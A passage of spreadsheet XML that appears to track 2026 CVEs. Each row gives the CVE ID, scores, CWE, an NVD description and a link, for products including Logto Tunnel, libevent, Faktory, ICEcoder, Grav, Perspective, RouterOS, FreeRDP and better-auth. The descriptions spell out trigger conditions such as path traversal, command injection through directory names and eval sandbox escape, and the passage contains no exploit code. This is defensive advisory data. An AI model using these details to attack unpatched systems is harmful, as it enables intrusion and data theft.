      <c r="E1168" s="5" t="inlineStr"/>
      <c r="F1168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1168" s="5" t="inlineStr"/>
      <c r="H1168" s="5" t="inlineStr"/>
      <c r="I1168" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1168" s="5" t="inlineStr"/>
      <c r="K1168" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1168" s="5" t="inlineStr">
        <is>
          <t>Logto is the modern, open-source auth infrastructure for SaaS and AI apps. Prior to 0.3.9, the Logto Tunnel npm package enabled createStaticFileProxy from packages/tunnel/src/commands/tunnel/index.ts and passed request.url from static asset requests through packages/tunnel/src/commands/tunnel/utils.ts using path.join(staticPath, request.url) and then fs.open(requestPath, "r") without URL normalization or a containment check. When --experience-path was enabled and the tunnel port was reachable, an unauthenticated requester could send a path containing ../ to createStaticFileProxy and read files outside the configured static directory that were readable by the logto-tunnel process. The service used server.listen(port), which could expose the tunnel to other hosts depending on the platform and deployment. This issue is fixed in version 0.3.9.</t>
        </is>
      </c>
      <c r="M1168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63188</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63383</t>
        </is>
      </c>
      <c r="C1169" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1169" s="5" t="inlineStr"/>
      <c r="F1169" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1169" s="5" t="inlineStr"/>
      <c r="H1169" s="5" t="inlineStr"/>
      <c r="I1169" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1169" s="5" t="inlineStr"/>
      <c r="K1169" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1169" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent can read beyond a contiguous evbuffer region in event_tagging.c when decode_tag_internal requests at most five bytes from evbuffer_pullup but iterates using the full logical buffer length. A fragmented evbuffer containing a six-byte malformed tag can therefore advance past the pullup window and trigger an out-of-bounds read, which can crash a process that decodes attacker-controlled tagged RPC data. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M1169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63383</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63384</t>
        </is>
      </c>
      <c r="C1170" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1170" s="5" t="inlineStr"/>
      <c r="F1170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1170" s="5" t="inlineStr"/>
      <c r="H1170" s="5" t="inlineStr"/>
      <c r="I1170" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1170" s="5" t="inlineStr"/>
      <c r="K1170" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1170" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an incorrect integer conversion in event_tagging.c when evtag_unmarshal_header uses evtag_decode_int to decode an attacker-controlled uint32 payload length and returns it as a signed int. Values above INT_MAX become negative or truncated, and evtag_unmarshal_string can use the converted value in allocation sizing, producing a wrapped large allocation request and denial of service. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="M1170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63384</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63403</t>
        </is>
      </c>
      <c r="C1171" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1171" s="5" t="inlineStr"/>
      <c r="F1171" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1171" s="5" t="inlineStr"/>
      <c r="H1171" s="5" t="inlineStr"/>
      <c r="I1171" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1171" s="5" t="inlineStr"/>
      <c r="K1171" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1171" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the server is vulnerable to an unauthenticated denial of service in which a single malformed command crashes the entire process. Its wire protocol is line-based, and several command handlers slice or index the received line at a fixed offset, such as cmd[5:] for PUSH or qs[0] for QUEUE, without checking that a payload is present. Sending a bare verb with no payload, for example PUSH, ACK, FAIL, BEAT, PUSHB, or QUEUE, triggers a Go slice or index out-of-range panic. Because the codebase has no recover() anywhere in the command-dispatch path, an unrecovered panic in a handler goroutine terminates the whole Go process rather than just that connection, instantly disconnecting every other client, worker, and in-flight job. The attack requires only a connection to the command port and completion of the trivial handshake, with no credentials when no password is configured, and can be repeated to keep the service down indefinitely. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="M1171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63403</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64836</t>
        </is>
      </c>
      <c r="C1172" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1172" s="5" t="inlineStr"/>
      <c r="F1172" s="5" t="inlineStr"/>
      <c r="G1172" s="5" t="inlineStr"/>
      <c r="H1172" s="5" t="inlineStr"/>
      <c r="I1172" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1172" s="5" t="inlineStr"/>
      <c r="K1172" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-697</t>
        </is>
      </c>
      <c r="L1172" s="5" t="inlineStr">
        <is>
          <t>ICEcoder versions through 8.1 contain a path traversal vulnerability in the file-control endpoint due to a logic error in the document-root confinement check. The File::check() validation function compares realpath() to boolean true, which never succeeds, allowing authenticated attackers to submit traversal sequences or absolute paths in the file parameter to read, write, or delete files outside the configured document root.</t>
        </is>
      </c>
      <c r="M1172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64836</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64837</t>
        </is>
      </c>
      <c r="C1173" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1173" s="5" t="inlineStr"/>
      <c r="F1173" s="5" t="inlineStr"/>
      <c r="G1173" s="5" t="inlineStr"/>
      <c r="H1173" s="5" t="inlineStr"/>
      <c r="I1173" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1173" s="5" t="inlineStr"/>
      <c r="K1173" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1173" s="5" t="inlineStr">
        <is>
          <t>ICEcoder through 8.1 passes an unescaped filesystem path into a shell command in lib/properties.php, allowing authenticated users to inject OS commands through directory names. Attackers can create directories with shell metacharacters in their names and access the Properties function to execute arbitrary commands as the web-server user via popen().</t>
        </is>
      </c>
      <c r="M1173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64837</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64838</t>
        </is>
      </c>
      <c r="C1174" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1174" s="5" t="inlineStr"/>
      <c r="F1174" s="5" t="inlineStr"/>
      <c r="G1174" s="5" t="inlineStr"/>
      <c r="H1174" s="5" t="inlineStr"/>
      <c r="I1174" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1174" s="5" t="inlineStr"/>
      <c r="K1174" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1174" s="5" t="inlineStr">
        <is>
          <t>ICEcoder versions through 8.1 fail to properly validate the oldFileName parameter in file move and rename operations, allowing authenticated users to relocate files from outside the document root. Attackers can use path traversal sequences in oldFileName to move files writable by the PHP process into the web-accessible project directory, disclosing file contents and deleting originals.</t>
        </is>
      </c>
      <c r="M1174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64838</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64850</t>
        </is>
      </c>
      <c r="C1175" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1175" s="5" t="inlineStr"/>
      <c r="F1175" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1175" s="5" t="inlineStr"/>
      <c r="H1175" s="5" t="inlineStr"/>
      <c r="I1175" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1175" s="5" t="inlineStr"/>
      <c r="K1175" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1175" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.7, Grav Blueprint::dynamicData() in system/src/Grav/Common/Data/Blueprint.php sends an editor-controlled Class::method provider and arguments to call_user_func_array() without rejecting dangerous callback parameters. An account with admin.pages or api.pages.write can use Grav\Common\Utils::arrayFilterRecursive() as a trampoline with system as the callback, place a command in page frontmatter, and execute that command as the web server user when the page is viewed. This issue is fixed in version 2.0.7.</t>
        </is>
      </c>
      <c r="M1175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64850</t>
        </is>
      </c>
    </row>
    <row r="1176">
      <c r="A1176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64852</t>
        </is>
      </c>
      <c r="C1176" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1176" s="5" t="inlineStr"/>
      <c r="F1176" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1176" s="5" t="inlineStr"/>
      <c r="H1176" s="5" t="inlineStr"/>
      <c r="I1176" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1176" s="5" t="inlineStr"/>
      <c r="K1176" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1176" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.8, the Grav API plugin intercepts the apiKeyGenerate and apiKeyRevoke admin tasks in user/plugins/api/api.php and authorizes the caller with only admin.login. A basic panel user can select another account from the route, create a persistent ApiKeyManager credential bound to that target, and inherit the target's API permissions, including api.super or administrative write access when present. This issue is fixed in version 1.0.8.</t>
        </is>
      </c>
      <c r="M1176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64852</t>
        </is>
      </c>
    </row>
    <row r="1177">
      <c r="A1177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66360</t>
        </is>
      </c>
      <c r="C1177" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1177" s="5" t="inlineStr"/>
      <c r="F1177" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1177" s="5" t="inlineStr"/>
      <c r="H1177" s="5" t="inlineStr"/>
      <c r="I1177" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1177" s="5" t="inlineStr"/>
      <c r="K1177" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1177" s="5" t="inlineStr">
        <is>
          <t>The ISO Presentation layer contains a flaw in the handling of specific 
parameters during normal mode negotiation. A missing length check in the
 processing of the encoded presentation data allows an attacker 
controlled field with a zero length value to trigger a bounded heap over
 read. This condition occurs before MMS session establishment, a crafted
 TCP/102 connection attempt can trigger the issue. The resulting over 
read causes the process to terminate, leading to a denial of service 
condition.</t>
        </is>
      </c>
      <c r="M1177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66360</t>
        </is>
      </c>
    </row>
    <row r="1178">
      <c r="A1178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66840</t>
        </is>
      </c>
      <c r="C1178" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1178" s="5" t="inlineStr"/>
      <c r="F1178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1178" s="5" t="inlineStr"/>
      <c r="H1178" s="5" t="inlineStr"/>
      <c r="I1178" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1178" s="5" t="inlineStr"/>
      <c r="K1178" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1178" s="5" t="inlineStr">
        <is>
          <t>XING CPTrans-ME-X contains an Exposure of Sensitive System Information to an Unauthorized Control Sphere (CWE-497). Sensitive system information may be leaked.</t>
        </is>
      </c>
      <c r="M1178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66840</t>
        </is>
      </c>
    </row>
    <row r="1179">
      <c r="A1179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67195</t>
        </is>
      </c>
      <c r="C1179" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1179" s="5" t="inlineStr"/>
      <c r="F1179" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1179" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1179" s="5" t="inlineStr"/>
      <c r="I1179" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1179" s="5" t="inlineStr"/>
      <c r="K1179" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1179" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary operating system commands by submitting crafted expression strings to the PolarsVirtualServer backend, which passes client-supplied input directly to Python's eval() with only __builtins__={} cleared. Attackers can exploit Python object attribute traversal through the interpreter's loaded class list to reach subprocess.Popen via a TableValidateExprReq or TableMakeViewReq protobuf message, achieving arbitrary command execution in the Perspective host process.</t>
        </is>
      </c>
      <c r="M1179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67195</t>
        </is>
      </c>
    </row>
    <row r="1180">
      <c r="A1180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67198</t>
        </is>
      </c>
      <c r="C1180" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1180" s="5" t="inlineStr"/>
      <c r="F1180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1180" s="5" t="inlineStr"/>
      <c r="H1180" s="5" t="inlineStr"/>
      <c r="I1180" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1180" s="5" t="inlineStr"/>
      <c r="K1180" s="5" t="inlineStr">
        <is>
          <t>CWE-616</t>
        </is>
      </c>
      <c r="L1180" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a denial-of-service vulnerability in the VirtualServer protocol dispatcher that allows unauthenticated remote attackers to crash the server process by sending malformed or incomplete protobuf messages. Attackers can send well-formed requests such as ViewToArrowReq with no viewport set or MakeTableReq with no data field to trigger unwrap() calls on None values at nine distinct sites, causing the process to abort with SIGABRT.</t>
        </is>
      </c>
      <c r="M1180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67198</t>
        </is>
      </c>
    </row>
    <row r="1181">
      <c r="A1181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67200</t>
        </is>
      </c>
      <c r="C1181" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1181" s="5" t="inlineStr"/>
      <c r="F1181" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1181" s="5" t="inlineStr"/>
      <c r="H1181" s="5" t="inlineStr"/>
      <c r="I1181" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1181" s="5" t="inlineStr"/>
      <c r="K1181" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1181" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a path traversal vulnerability that allows unauthenticated remote attackers to read arbitrary files from the server filesystem by including literal ../ segments in HTTP request URL paths. Attackers can bypass the insufficient query-string-stripping sanitization to traverse outside the configured asset root directory and retrieve sensitive files such as system credentials and application secrets, with results exposed cross-origin due to a wildcard Access-Control-Allow-Origin header set on all responses.</t>
        </is>
      </c>
      <c r="M1181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67200</t>
        </is>
      </c>
    </row>
    <row r="1182">
      <c r="A1182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67281</t>
        </is>
      </c>
      <c r="C1182" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1182" s="5" t="inlineStr"/>
      <c r="F1182" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1182" s="5" t="inlineStr"/>
      <c r="H1182" s="5" t="inlineStr"/>
      <c r="I1182" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1182" s="5" t="inlineStr"/>
      <c r="K1182" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-824</t>
        </is>
      </c>
      <c r="L1182" s="5" t="inlineStr">
        <is>
          <t>RouterOS WebFig contains an unauthenticated file-read vulnerability in the /jsproxy path where a newly allocated session retains a stale uninitialized principal pointer used for file authorization. An unauthenticated attacker can prepare the allocator so that the file-serving path dereferences this pointer with sufficient rights, then supply parent-directory components in an encrypted URI to escape the WebFig file namespace and disclose root-owned files, including configuration stores containing credentials.This issue affects only 7.x branch was fixed in versions: 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="M1182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67281</t>
        </is>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67299</t>
        </is>
      </c>
      <c r="C1183" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1183" s="5" t="inlineStr"/>
      <c r="F1183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1183" s="5" t="inlineStr"/>
      <c r="H1183" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I1183" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1183" s="5" t="inlineStr"/>
      <c r="K1183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1183" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 contains a client-side heap use-after-free in the async update message proxy for WINDOW_ICON_ORDER when AsyncUpdate is enabled (e.g. xfreerdp /async-update). In update_message_WindowIcon() a shallow CopyMemory() overwrites a freshly allocated lParam-&gt;iconInfo with the parser-owned windowIcon-&gt;iconInfo pointer. After the parser callback returns, update_recv_window_info_order() frees window_icon.iconInfo, but the queued async message still retains and later dispatches that stale pointer. A malicious or compromised RDP server sending a crafted RAIL Window Alternate Secondary Order with WINDOW_ORDER_ICON can trigger use-after-free, leading to memory corruption and client crash.</t>
        </is>
      </c>
      <c r="M1183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67299</t>
        </is>
      </c>
    </row>
    <row r="1184">
      <c r="A1184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67301</t>
        </is>
      </c>
      <c r="C1184" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1184" s="5" t="inlineStr"/>
      <c r="F1184" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1184" s="5" t="inlineStr"/>
      <c r="H1184" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I1184" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1184" s="5" t="inlineStr"/>
      <c r="K1184" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1184" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 contains out-of-bounds read vulnerabilities in the async update message proxy for the PolygonSC and PolygonCB primary drawing orders. When AsyncUpdate is enabled (e.g., xfreerdp /async-update), update_message_PolygonSC() and update_message_PolygonCB() allocate a fresh points array but copy point data from the address of the order structure instead of from polygonSC-&gt;points / polygonCB-&gt;points, resulting in a client-side out-of-bounds read. A malicious or compromised RDP server sending crafted PolygonSC/PolygonCB update orders can trigger memory disclosure or a client crash.</t>
        </is>
      </c>
      <c r="M1184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67301</t>
        </is>
      </c>
    </row>
    <row r="1185">
      <c r="A1185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67304</t>
        </is>
      </c>
      <c r="C1185" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1185" s="5" t="inlineStr"/>
      <c r="F1185" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1185" s="5" t="inlineStr"/>
      <c r="H1185" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I1185" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1185" s="5" t="inlineStr"/>
      <c r="K1185" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1185" s="5" t="inlineStr">
        <is>
          <t>FreeRDP before 3.29.0 contains a null pointer dereference vulnerability in smartcard device control request cleanup when reader-state decoding fails. Attackers can send malformed smartcard IRP requests with non-zero cReaders and truncated reader-state data to crash the process via null pointer access in free_reader_states functions.</t>
        </is>
      </c>
      <c r="M1185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67304</t>
        </is>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67327</t>
        </is>
      </c>
      <c r="C1186" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1186" s="5" t="inlineStr"/>
      <c r="F1186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1186" s="5" t="inlineStr"/>
      <c r="H1186" s="5" t="inlineStr"/>
      <c r="I1186" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1186" s="5" t="inlineStr"/>
      <c r="K1186" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1186" s="5" t="inlineStr">
        <is>
          <t>better-auth versions &gt;= 1.1.3 and &lt; 1.6.22 (and pre-release versions &gt;= 1.7.0-beta.0 and &lt; 1.7.0-beta.10) are vulnerable to account takeover via pre-account hijacking on magic-link and email-OTP sign-in when open email/password registration is enabled. An attacker registers an account with the victim's email address and an attacker-chosen password; the account remains unverified. When the legitimate owner later signs in via the magic-link or email-OTP passwordless flow, the account is marked verified without removing the pre-existing password or revoking existing sessions, so the attacker's password remains valid, granting persistent access to the victim's account. Fixed in 1.6.22 and 1.7.0-beta.10.</t>
        </is>
      </c>
      <c r="M1186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67327</t>
        </is>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67331</t>
        </is>
      </c>
      <c r="C1187" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1187" s="5" t="inlineStr"/>
      <c r="F1187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1187" s="5" t="inlineStr"/>
      <c r="H1187" s="5" t="inlineStr"/>
      <c r="I1187" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1187" s="5" t="inlineStr"/>
      <c r="K1187" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1187" s="5" t="inlineStr">
        <is>
          <t>better-auth SCIM versions from 1.5.0 before 1.7.0-beta.4 fail to bind non-organization SCIM providers to their creator by default, allowing authenticated users to manage other users' providers. Attackers can regenerate SCIM bearer tokens, invalidate legitimate tokens, and authenticate to SCIM API routes with the attacker-controlled token.</t>
        </is>
      </c>
      <c r="M1187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67331</t>
        </is>
      </c>
    </row>
    <row r="1188">
      <c r="A1188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67581</t>
        </is>
      </c>
      <c r="C1188" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1188" s="5" t="inlineStr"/>
      <c r="F1188" s="5" t="n">
        <v>0.005</v>
      </c>
